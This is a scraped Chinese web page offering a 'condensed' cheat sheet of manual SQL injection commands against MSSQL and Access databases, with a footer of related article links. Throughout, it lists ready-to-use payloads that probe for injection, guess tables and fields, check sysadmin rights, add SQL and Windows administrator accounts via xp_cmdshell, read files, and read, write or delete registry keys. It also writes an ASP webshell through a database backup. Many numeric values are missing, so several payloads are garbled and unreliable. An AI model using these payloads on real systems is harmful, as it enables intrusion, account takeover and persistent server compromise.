手动方式SQL注入脚本命令之精华版
.判断是否有注入;and = ;and =
.初步判断是否是mssql ;and user> .注入参数是字符and [查询条件] and = .搜索时没过滤参数的and [查询条件] and %= .判断数据库系统 ;and (select count(*) from sysobjects)> mssql ;and (select count(*) from msysobjects)> access .猜数据库 ;and (select Count(*) from [数据库名])> .猜字段 ;and (select Count(字段名) from 数据库名)> .猜字段中记录长度 ;and (select top len(字段名) from 数据库名)> .()猜字段的ascii值(access) ;and (select top asc(mid(字段名,,)) from 数据库名)> ()猜字段的ascii值(mssql) ;and (select top unicode(substring(字段名,,)) from 数据库名)> .测试权限结构(mssql) ;and =(select IS_SRVROLEMEMBER(sysadmin));-- ;and =(select IS_SRVROLEMEMBER(serveradmin));-- ;and =(select IS_SRVROLEMEMBER(setupadmin));-- ;and =(select IS_SRVROLEMEMBER(securityadmin));-- ;and =(select IS_SRVROLEMEMBER(diskadmin));-- ;and =(select IS_SRVROLEMEMBER(bulkadmin));-- ;and =(select IS_MEMBER(db_owner));-- .添加mssql和系统的帐户 ;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;-- ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ;exec master.dbo.xp_cmdshell net user username password /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add;-- ;exec master.dbo.xp_cmdshell net user username password /add;-- ;exec master.dbo.xp_cmdshell net localgroup administrators username /add;-- .()遍历目录 ;create table dirs(paths varchar(), id int) ;insert dirs exec master.dbo.xp_dirtree c: ;and (select top paths from dirs)> ;and (select top paths from dirs where paths not in(上步得到的paths))>) ()遍历目录 ;create table temp(id nvarchar(),num1 nvarchar(),num2 nvarchar(),num3 nvarchar());--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ;insert into temp(id) exec master.dbo.xp_subdirs c:;-- 获得子目录列表 ;insert into temp(id,num1) exec master.dbo.xp_dirtree c:;-- 获得所有子目录的目录树构 ;insert into temp(id) exec master.dbo.xp_cmdshell type c:webindex.asp;-- 查看文件的内容 .mssql中的存储过程 xp_regenumvalues 注册表根键, 子键 ;exec xp_regenumvalues HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionRun 以多个记录集方式返回所有键值 xp_regread 根键,子键,键值名 ;exec xp_regread HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,CommonFilesDir 返回制定键的值 xp_regwrite 根键,子键, 值名, 值类型, 值 值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ;exec xp_regwrite HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestValueName,reg_sz,hello 写入注册表 xp_regdeletevalue 根键,子键,值名 exec xp_regdeletevalue HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestValueName 删除某个值 xp_regdeletekey HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionTestkey 删除键,包括该键下所有值 .mssql的backup创建webshell use model create table cmd(str image); insert into cmd(str) values (); backup database model to disk=c:l.asp; .mssql内置函数 ;and (select @@version)> 获得Windows的版本号 ;and user_name()=dbo 判断当前系统的连接用户是不是sa ;and (select user_name())> 爆当前系统的连接用户 ;and (select db_name())> 得到当前连接的数据库 .简洁的webshell use model create table cmd(str image); insert into cmd(str) values (); backup database model to disk=g:wwwtestl.asp;
手动方式SQL注入脚本命令之精华版的更多相关文章
- SQL注入常用命令
1. 数据库查询版本 Mssql select @@version Mysql select vresion()/select @@version oracle select banner from ...
- phpcms v9 sql注入脚本
phpcms v9 SQL注入脚本 用法:python phpcms.py http://www.baidu.com import requests,sys,urllib url = sys.argv ...
- python 打造一个sql注入脚本 (一)
0x00前言: 昨天刚刚看完小迪老师的sql注入篇的第一章 所以有了新的笔记. 0x01笔记: sql注入原理: 网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作. sql ...
- 安全测试5_服务端的安全漏洞(SQL注入、命令注入、文件操作类)
前面大致讲解了下客户端的安全漏洞,现在来讲解下服务端的安全漏洞. 1.SQL注入(SQL Injection),是一种常见的Web安全漏洞,攻击者利用这个漏洞,可以访问或修改数据,或者利用潜在的数据库 ...
- 常规SQL注入脚本
一:union报错注入 猜字段长度:order by 28 先显示位http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,9 当前数 ...
- SQL注入脚本(基于时间)
#encoding=utf-8 import httplib import time import string import sys import urllib header = {'Accept' ...
- 禁用substr、substring、mid函数的sql注入脚本
#encodeing=utf-8 import requests import sys reload(sys) sys.setdefaultencoding('utf-8') payloads = l ...
- SQL注入技术专题—由浅入深【精华聚合】
作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23569276来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 不管用什么语言编写的Web应用 ...
- SQL注入学习资料总结
转载自:https://bbs.ichunqiu.com/thread-12105-1-1.html 什么是SQL注入 SQL注入基本介绍 结构化查询语言(Structured Query Lang ...
随机推荐
- Field.setAccessible()方法
http://blog.csdn.net/kjfcpua/article/details/8496911 java代码中,常常将一个类的成员变量置为private 在类的外面获取此类的私有成员变量的v ...
- MySQL双主如何解决主键冲突问题
搭建了个双主,突然想到如果表设置了自增主键的话,当业务同时向双库中插入一条数据,这时候情况是什么样子的呢? 比如:主库A和主库B上的一个表数据为: 12 'ninhao' .当业务同时写入数据后主库A ...
- position sticky 定位
1.兼容性 https://caniuse.com/#search=sticky chrome.ios和firefox兼容性良好. 2.使用场景 sticky:粘性.粘性布局. 在屏幕范围内时,元素不 ...
- 解决Cydia出现红字提示“Sub-process/usr/bin/dpkg returned an error code(2)
进入此路径/var/lib/dpkg/,修改红框中的文件名,依次修改为:"available" 重新命名为 "available-bak":"stat ...
- 用srvctl命令配置service
.用srvctl命令配置service 除了用DBCA图形方式,还能够使用命令方式配置service,这样的方法对于维护远程尤事实上用.不管是创建还是维护都是用一个命令srvctl,先看一下srvct ...
- java IO流之文件切割两例(含Properties 用法)
package cn.itcast.io.p1.splitfile; import java.io.File;import java.io.FileInputStream;import java.io ...
- Windows下安装OpenSSL及其使用
方法一: Windows binaries can be found here: http://www.slproweb.com/products/Win32OpenSSL.html You can ...
- TP3.2设置URL伪静态满足更好的SEO效果
URL伪静态通常是为了满足更好的SEO效果,ThinkPHP支持伪静态URL设置,可以通过设置URL_HTML_SUFFIX参数随意在URL的最后增加你想要的静态后缀,而不会影响当前操作的正常执行. ...
- PHP中的安全函数
安全是编程非常重要的一个方面.在任何一种编程语言中,都提供了许多的函数或者模块来确保程序的安全性.在现代网站应用中,经常要获取来自世界各地用户的输入,但是,我们都知道“永远不能相信那些用户输入的数据” ...
- Falsk-信号
Flask框架中的信号基于blinker,其主要就是让开发者可是在flask请求过程中定制一些用户行为. 安装:pip3 install blinker request_started = _sign ...